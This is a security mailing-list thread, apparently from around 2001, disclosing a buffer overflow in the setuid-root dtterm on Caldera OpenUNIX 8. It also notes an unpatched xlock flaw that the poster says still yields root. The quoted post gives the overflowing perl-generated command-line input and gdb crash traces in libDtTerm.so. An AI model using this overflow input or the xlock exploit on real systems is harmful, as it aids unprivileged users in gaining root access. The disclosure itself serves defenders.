Yes, I read yours...It looks like it's a multiple vendor shared library(libDtTerm.so) problem to me. Also Caldera must supply a patch for OpenUNIX 8 xlock vulnerability. I sent a mail to "security-alert" a few days ago about xlock vulnerability but they told me that they put an unofficial patch for Unixware 7, OpenUNIX 8 still VULNERABLE (patch is not applicable on OpenUNIX 8). I think this is a serious bug. For example in earlier 1999 I remember, K2 released an exploit for unixware 7 xlock vulnerability and any standard user that can make a little modification get root access on OpenUNIX 8 TODAY (I got root). Hey man, exploit is around 2 years old and it worked. KF wrote: >This goes along with a mailing from earlier this morning ... I stated >that >I was able to make ALL suid / sgid dt* files core dump except the dtmail >binary... >-KF > >Aycan Irican wrote: > >>-----BEGIN PGP SIGNED MESSAGE----- >>Hash: SHA1 >> >>Another dt series bug... >> >>$ uname -a >>OpenUNIX zen 5 8.0.0 i386 x86at Caldera UNIX_SVR5 >>$ id >>uid=101(fixxxer) gid=1(other) >>$ ls -al /usr/dt/bin/dtterm >>- -r-sr-xr-x 1 root bin 60892 Haz 10 05:03 >>/usr/dt/bin/dtterm >>$ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1040'` >>Warning: Missing charsets in String to FontSet conversion >>Warning: Missing charsets in String to FontSet conversion >>Memory fault >> >> # /usr/gnu/bin/gdb /usr/dt/bin/dtterm >>(no debugging symbols found)... >>(gdb) set args -tn `perl -e 'print "A"x1040'` >>(gdb) run >>Starting program: /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1040'` >>(no debugging symbols found)...(no debugging symbols found)... >>... >>.. >>[New LWP 2] >> >> Program received signal SIGSEGV, Segmentation fault. >>0xbff9a4b8 in strncmp () from /usr/lib/libc.so.1 >>[New Thread 1] >>(gdb)set args -tn `perl -e 'print "A"x1042'` >>(gdb) run >>Starting program: /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1042'` >>(no debugging symbols found)...(no debugging symbols found)... >>[New LWP 2] >> >> Program received signal SIGSEGV, Segmentation fault. >>0xbff3abca in _mergeEnv () from /usr/dt/lib/libDtTerm.so.1 >>[New Thread 1] >>(gdb)q >> >>self-explained... >>enjoy... >> >>- -- >>Aycan ]rican >>Systems Engineer >>Prosoft Communication Systems Ltd. >>Resit Galip Cad. 85/2 Gaziosmanpa~a 06700 Ankara >>Tel:+90-312-446-6616 Fax:+90-312-446-2423 >>-----BEGIN PGP SIGNATURE----- >>Version: GnuPG v1.0.6 (GNU/Linux) >>Comment: For info see http://www.gnupg.org >> >>iD8DBQE7uVaiJZJwgy0AK78RAsbKAJ0Y8YiCi+yagy2ep42v8wfsu+dsFQCdFIUt >>5M67ZahjhrfqnvdlMsqE4SM= >>=CNXa >>-----END PGP SIGNATURE----- >>
